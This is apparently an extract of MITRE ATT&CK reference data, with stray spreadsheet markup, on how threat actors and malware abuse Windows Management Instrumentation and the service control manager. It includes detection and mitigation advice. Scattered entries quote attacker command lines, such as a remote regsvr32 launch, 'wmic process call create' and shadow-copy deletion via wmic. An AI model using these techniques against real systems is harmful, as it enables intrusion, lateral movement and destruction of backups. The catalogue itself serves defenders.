During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (`wmiprvse.exe`) to execute a variety of encoded PowerShell scripts using the `DownloadString` method.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used Windows Management Instrumentation (WMI) to move laterally via [Impacket](https://attack.mitre.org/software/S0357).(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used `wmiexec.vbs` to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used WMIC to executed a remote XSL script.(Citation: ESET Lazarus Jun 2020)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors has used WMI to execute commands.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used WMI for the remote execution of files for lateral movement.(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) used WMI to steal credentials and execute backdoors at a future time.(Citation: Mandiant No Easy Breach)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used WMI to deploy their tools on remote machines and to gather information about the Outlook process.(Citation: Cybereason Cobalt Kitty 2017)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used wmic.exe to set environment variables.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used WMIC to execute remote commands.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)
Deep Panda
The [Deep Panda](https://attack.mitre.org/groups/G0009) group is known to utilize WMI for lateral movement.(Citation: Alperovitch 2014)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized `WMI` to execute commands and move laterally on compromised Windows machines.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used WMI to automate the remote execution of PowerShell scripts.(Citation: Security Intelligence More Eggs Aug 2019)	
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used WMI to install malware on targeted systems.(Citation: eSentire FIN7 July 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061)'s malicious spearphishing payloads use WMI to launch malware and spawn `cmd.exe` execution. [FIN8](https://attack.mitre.org/groups/G0061) has also used WMIC and the [Impacket](https://attack.mitre.org/software/S0357) suite for lateral movement, as well as during and post compromise cleanup activities.(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Symantec FIN8 Jul 2023)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used WMI to execute scripts used for discovery.(Citation: CERT-EE Gamaredon January 2021)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used WMIC to execute commands on remote computers.(Citation: Symantec WastedLocker June 2020) 
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)(Citation: Kaspersky ThreatNeedle Feb 2021)(Citation: Qualys LolZarus)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for execution.(Citation: Proofpoint Leviathan Oct 2017)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used a tool to run `cmd /c wmic computersystem get domain` for discovery.(Citation: DFIR Report APT35 ProxyShell March 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that leveraged WMI for execution and querying host information.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has executed PowerShell scripts via WMI.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)
Naikon
[Naikon](https://attack.mitre.org/groups/G0019) has used WMIC.exe for lateral movement.(Citation: Bitdefender Naikon April 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used WMI for execution.(Citation: FireEye APT34 Webinar Dec 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used [Impacket](https://attack.mitre.org/software/S0357)’s WMIexec module for remote code execution and VBScript to run WMI queries.(Citation: Dragos Crashoverride 2018)(Citation: Microsoft Prestige ransomware October 2022)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via Windows Management Instrumentation (WMI).(Citation: Citizen Lab Stealth Falcon May 2016)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used WMI to query targeted systems for security products.(Citation: Proofpoint TA2541 February 2022)
Threat Group-3390
A [Threat Group-3390](https://attack.mitre.org/groups/G0027) tool can use WMI to execute a binary.(Citation: Nccgroup Emissary Panda May 2018)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has leveraged WMIC including for execution and remote system discovery.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used WMI to collect information about target machines.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery and to move laterally. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used batch scripts to leverage WMIC to deploy ransomware.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Github AD-Pentest-Script)(Citation: Symantec Cicada November 2020)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) can use WMI to gather AV products installed on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has used wmi queries to gather information from the system.(Citation: Bitdefender Agent Tesla April 2020) 
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses WMIC to execute payloads. (Citation: Cofense Astaroth Sept 2018)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) uses wmic.exe to delete shadow copies.(Citation: Hornet Security Avaddon June 2020)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can utilize WMI to collect system information, create new processes, and run malicious PowerShell scripts on a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can execute a WMI query to gather information about the installed antivirus engine.(Citation: Cybereason Bazar July 2020)(Citation: DFIR Ryuk's Return October 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has used WMI to execute files over the network.(Citation: NCC Group Black Basta June 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can use `wmic.exe` to delete shadow copies on compromised networks.(Citation: Microsoft BlackCat Jun 2022)
BlackEnergy
A [BlackEnergy](https://attack.mitre.org/software/S0089) 2 plug-in uses WMI to gather victim host details.(Citation: Securelist BlackEnergy Feb 2015)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use WMI to move laterally.(Citation: Palo Alto Brute Ratel July 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use WMI to gather system information and to spawn processes for code injection.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can use `wmic` to gather information from a system.(Citation: Check Point APT35 CharmPower January 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use WMI to deliver a payload to a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)	
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can use WMI queries to obtain system information.(Citation: Secureworks DarkTortilla Aug 2022)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can use WMI to execute commands.(Citation: Prevailion DarkWatchman 2021)
DustySky
The [DustySky](https://attack.mitre.org/software/S0062) dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.(Citation: DustySky)
EKANS
[EKANS](https://attack.mitre.org/software/S0605) can use Windows Mangement Instrumentation (WMI) calls to execute operations.(Citation: Dragos EKANS)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.(Citation: Prevailion EvilNum May 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used WMI to execute powershell.exe.(Citation: Carbon Black Emotet Apr 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use WMI to deliver a payload to a remote host.(Citation: Github PowerShell Empire) 
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has used WMI to gather information about the system.(Citation: Cyphort EvilBunny Dec 2014)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) uses WMI to query the Windows Registry.(Citation: ESET GreyEnergy Oct 2018)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) can use WMI to delete files on a  target machine.(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) leverages WMI to enumerate anti-virus on the victim.(Citation: Proofpoint TA505 Mar 2018)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can use WMI to open a Windows command shell on a remote machine.(Citation: Bitdefender FunnyDream Campaign November 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).(Citation: Talos GravityRAT)
HALFBAKED
[HALFBAKED](https://attack.mitre.org/software/S0151) can use WMI queries to gather system information.(Citation: FireEye FIN7 April 2017)
HELLOKITTY
[HELLOKITTY](https://attack.mitre.org/software/S0617) can use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.(Citation: US-CERT HOPLIGHT Apr 2019)	
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\&lt;filename&gt;.dll`.(Citation: ESET Hermetic Wizard March 2022)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used WMI to execute binaries.(Citation: Juniper IcedID June 2020)
Impacket
[Impacket](https://attack.mitre.org/software/S0357)'s wmiexec module can be used to execute commands through WMI.(Citation: Impacket Tools)
KOMPROGO
[KOMPROGO](https://attack.mitre.org/software/S0156) is capable of running WMI queries.(Citation: FireEye APT32 May 2017)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) obtains a list of running processes through WMI querying.(Citation: Unit 42 Kazuar May 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can use WMI to execute commands.(Citation: Github Koadic)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can use WMI to log into remote machines for propagation.(Citation: Unit 42 Lucifer June 2020)
Maze
[Maze](https://attack.mitre.org/software/S0449) has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) 
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use `wmic.exe` as part of its effort to delete shadow copies.(Citation: Check Point Meteor Aug 2021)
Micropsia
[Micropsia](https://attack.mitre.org/software/S0339) searches for anti-virus software and firewall products installed on the victim’s machine using WMI.(Citation: Talos Micropsia June 2017)(Citation: Radware Micropsia July 2018)
MoleNet
[MoleNet](https://attack.mitre.org/software/S0553) can perform WMI commands on the system.(Citation: Cybereason Molerats Dec 2020)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256)'s installer uses WMI to search for antivirus display names.(Citation: ESET Turla Mosquito Jan 2018)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can use WMI to delete Shadow Volumes.(Citation: TrendMicro Netwalker May 2020)	
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) can use &lt;code&gt;wmic&lt;/code&gt; to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has used wmic.exe for local discovery information.(Citation: Securelist Octopus Oct 2018)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses WMI to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) uses WMI to perform discovery techniques.(Citation: Unit 42 OilRig Sept 2018)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use WMI queries to retrieve data from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) may use WMI when collecting information about a victim.(Citation: FireEye APT34 Dec 2017)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) has a number of modules that use WMI to execute tasks.(Citation: GitHub PoshC2)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-WmiCommand&lt;/code&gt; CodeExecution module uses WMI to execute and retrieve the output from a [PowerShell](https://attack.mitre.org/techniques/T1086) payload.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can use WMIC to execute scripts on targeted hosts.(Citation: Group IB Ransomware September 2020)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) has attempted to execute with WMIC.(Citation: Checkpoint MosesStaff Nov 2021)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can execute WMI queries to gather information.(Citation: Kaspersky QakBot September 2021)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) uses WMI to perform process monitoring.(Citation: Lazarus RATANKBA)(Citation: RATANKBA)
REvil
[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) executes received commands with wmic.exe (for WMI commands). (Citation: Securelist Remexi Jan 2019)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) uses various WMI queries to check if the sample is running in a sandbox.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use WMI for lateral movement.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) used the WMI query &lt;code&gt;Select * From Win32_SystemDriver&lt;/code&gt; to retrieve a driver listing.(Citation: FireEye SUNBURST Backdoor December 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can use `WMI` queries to detect the presence of a virtual machine environment.(Citation: HP SVCReady Jun 2022) 
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) can use WMI to execute PowerShell commands on a compromised machine.(Citation: Bitdefender Sardonic Aug 2021)
SharpStage
[SharpStage](https://attack.mitre.org/software/S0546) can use WMI for execution.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) has used WMI to discover network connections and configurations. [Sibot](https://attack.mitre.org/software/S0589) has also used the Win32_Process class to execute a malicious DLL.(Citation: MSTIC NOBELIUM Mar 2021)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can query the WMI class `Win32_ComputerSystem` to gather information.(Citation: Morphisec Snip3 May 2021)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has used the WMI command-line (WMIC) utility to run tasks.(Citation: Kaspersky StoneDrill 2017)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) used WMI with an &lt;code&gt;explorer.exe&lt;/code&gt; token to execute on a remote share.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can use WMI for execution on a compromised host.(Citation: Trend Micro Iron Tiger April 2021)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) droppers have used WMI classes to execute [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)
Valak
[Valak](https://attack.mitre.org/software/S0476) can use &lt;code&gt;wmic process call create&lt;/code&gt; in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) utilizes &lt;code&gt;wmic&lt;/code&gt; to delete shadow copies.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)
Zebrocy
One variant of [Zebrocy](https://attack.mitre.org/software/S0251) uses WMI queries to gather information.(Citation: Unit42 Sofacy Dec 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse the Windows service control manager to execute malicious commands or payloads.
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
&lt;h4&gt; Analytic 1 - Service Control Manager spawning Command Shell&lt;/h4&gt;
&lt;code&gt;service_proto = filter flows where (dest_port == 445 and proto_info.pipe == “SVCCTL”)
service_create = filter flows where (proto_info.function == “CreateServiceW” OR proto_info.function == “CreateServiceA” OR proto_info.function == “StartServiceW” OR proto_info.function == “StartServiceA” )&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may abuse the Windows service control manager to execute malicious commands or payloads.
Service Creation
Monitor newly constructed services that abuse control manager to execute malicious commands or payloads.
Windows Registry Key Modification
Monitor for changes made to windows registry keys and/or values that may abuse the Windows service control manager to execute malicious commands or payloads.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by [PsExec](https://attack.mitre.org/software/S0029) from running. (Citation: win10_asr)
Privileged Account Management
Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level.
Restrict File and Directory Permissions
Ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), threat actors ran &lt;code&gt;sc start&lt;/code&gt; to start the COMSysApp as part of the service hijacking and &lt;code&gt;sc stop&lt;/code&gt; to stop and reconfigure the COMSysApp.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors created services on remote systems for execution purposes.(Citation: FoxIT Wocao December 2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used Windows services as a way to execute its malicious payload. (Citation: ESET OceanLotus Mar 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used  svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the "wercplsupport" service.(Citation: RedCanary Mockingbird May 2020)	
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used [PsExec](https://attack.mitre.org/software/S0029) to deploy beacons on compromised systems.(Citation: NCC Group Chimera January 2021)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used a tool known as RemoteExec (similar to [PsExec](https://attack.mitre.org/software/S0029)) to remotely execute batch scripts and binaries.(Citation: NCC Group APT15 Alive and Strong)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used [Winexe](https://attack.mitre.org/software/S0191) to install a service on the remote system.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used `services.exe` to execute scripts and executables during lateral movement within a victim's network. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used batch scripts that leverage [PsExec](https://attack.mitre.org/software/S0029) to execute a previously transferred ransomware payload on a victim's network.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk in 5 Hours October 2020)(Citation: Mandiant FIN12 Oct 2021)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can start, stop, or delete services.(Citation: Palo Alto Networks BBSRAT)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) drops a file named &lt;code&gt;infpub.dat&lt;/code&gt;into the Windows directory and is executed through SCManager and &lt;code&gt;rundll.exe&lt;/code&gt;.
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can create Windows system services for execution.(Citation: Palo Alto Brute Ratel July 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can create and start services on a compromised host.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host. It can also use Service Control Manager to start new services.(Citation: cobaltstrike manual)(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host.(Citation: Github PowerShell Empire)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has used svchost.exe to execute a malicious DLL .(Citation: US-CERT HOPLIGHT Apr 2019)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can create system services to aid in executing the payload.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can use `OpenRemoteServiceManager` to create a service.(Citation: ESET Hermetic Wizard March 2022)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) uses svchost.exe to execute a malicious DLL included in a new service group.(Citation: Symantec Hydraq Persistence Jan 2010)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has the ability to start and stop a specified service.(Citation: Unit42 Emissary Panda May 2019)
Impacket
[Impacket](https://attack.mitre.org/software/S0357) contains various modules emulating other service execution tools such as [PsExec](https://attack.mitre.org/software/S0029).(Citation: Impacket Tools)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can run a command on another machine using [PsExec](https://attack.mitre.org/software/S0029).(Citation: Github Koadic)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can create a remote service, let it run once, and then delete it.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
Net
The &lt;code&gt;net start&lt;/code&gt; and &lt;code&gt;net stop&lt;/code&gt; commands can be used in [Net](https://attack.mitre.org/software/S0039) to execute or stop Windows services.(Citation: Savill 1999)
Net Crawler
[Net Crawler](https://attack.mitre.org/software/S0056) uses [PsExec](https://attack.mitre.org/software/S0029) to perform remote service manipulation to execute a copy of itself as part of lateral movement.(Citation: Cylance Cleaver)
Netwalker
Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)
NotPetya
[NotPetya](https://attack.mitre.org/software/S0368) can use [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s loader can create a new service named NtmsSvc to execute the payload.(Citation: ESET Okrum July 2019)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) utilizes [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) has the ability to install itself as a Windows service.(Citation: Trend Micro Iron Tiger April 2021)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains an implementation of [PsExec](https://attack.mitre.org/software/S0029) for remote execution.(Citation: GitHub PoshC2)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) registers itself as a service on the victim’s machine to run as a standalone process.(Citation: McAfee GhostSecret)
PsExec
Microsoft Sysinternals [PsExec](https://attack.mitre.org/software/S0029) is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.(Citation: Russinovich Sysinternals)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) uses [PsExec](https://attack.mitre.org/software/S0029) to execute a payload or commands on a remote host.(Citation: GitHub Pupy)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has used [PsExec](https://attack.mitre.org/software/S0029) to copy and execute the ransomware.(Citation: CERT-FR PYSA April 2020)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)
RemoteCMD
[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new service on the remote system.(Citation: Symantec Buckeye)
SLOTHFULMEDIA
[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to start services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can install a service to execute itself as a service.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can manage services and processes.(Citation: Trend Micro Iron Tiger April 2021)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) can install itself as a service on compromised machines.(Citation: Talos TinyTurla September 2021)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can execute itself as a service.(Citation: NCC Group WastedLocker June 2020)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can download and execute AdvancedRun.exe via `sc.exe`.(Citation: Medium S2W WhisperGate January 2022)(Citation: Unit 42 WhisperGate January 2022)
Winexe
